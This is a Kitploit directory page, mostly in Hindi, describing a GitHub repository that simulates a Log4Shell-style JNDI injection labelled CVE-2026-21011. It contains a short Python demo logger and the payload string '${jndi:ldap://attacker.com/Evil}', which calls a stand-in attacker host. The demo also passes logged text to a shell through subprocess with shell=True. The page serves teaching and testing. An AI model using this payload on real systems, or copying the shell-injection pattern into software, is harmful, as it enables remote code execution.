Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated- — CVE-2026-21011 का अनुकरण करता है, जो एक कस्टम लॉगर में Log4j-शैली की JNDI इंजेक्शन है: ${jndi:...} पैटर्न को पार्स करता है और LDAP-द्वारा ट्रिगर की गई रिमोट कोड निष्पादन को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubgeorge0papasotiriou/cve-2026-21011-log4j-style-jndi-injection-in-custom-logger-simulated-

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

CVE-2026-21011 का अनुकरण करता है, जो एक कस्टम लॉगर में Log4j-शैली की JNDI इंजेक्शन है: ${jndi:...} पैटर्न को पार्स करता है और LDAP-द्वारा ट्रिगर की गई रिमोट कोड निष्पादन को प्रदर्शित करता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
17 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-21011 – कस्टम लॉगर में Log4j‑शैली JNDI इंजेक्शन (सिम्युलेटेड)

प्रोग्राम कोड (Python में Java सिमुलेशन)

root@kitploit:~
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re

def log(message):
    # Vulnerable: looks up JNDI-like syntax and executes
    pattern = r'\$\{jndi:(.+?)\}'
    for match in re.finditer(pattern, message):
        lookup = match.group(1)
        if lookup.startswith('ldap://'):
            # Simulate connecting to LDAP and loading a class
            print(f"Loading malicious class from {lookup}")
            subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True)  # just demo

log("User-Agent: ${jndi:ldap://attacker.com/Evil}")

CVE-2026-21011 – कस्टम लॉगर के माध्यम से JNDI इंजेक्शन

Severity: Critical

अवलोकन

एक कस्टम लॉगिंग फ्रेमवर्क लॉग संदेशों में ${jndi:...} पैटर्न का मूल्यांकन करता है, जो कुख्यात Log4Shell भेद्यता के समान है। एक हमलावर दूरस्थ सर्वर से मनमाना कोड लोड करने और निष्पादित करने के लिए एक JNDI लुकअप इंजेक्ट कर सकता है।

भेद्यता विवरण

  • प्रकार: कोड इंजेक्शन / JNDI इंजेक्शन
  • प्रभाव: रिमोट कोड निष्पादन।
  • मूल कारण: लॉगर उपयोगकर्ता-नियंत्रित डेटा को पार्स करता है और सामग्री के आधार पर डायनेमिक लुकअप करता है।

शोषण प्रदर्शन

सिमुलेशन चलाएँ:

root@kitploit:~
python log4j_sim.py

स्क्रिप्ट प्रिंट करती है कि यह हमलावर के LDAP सर्वर से एक क्लास लोड करेगी।

टूल डाउनलोड करें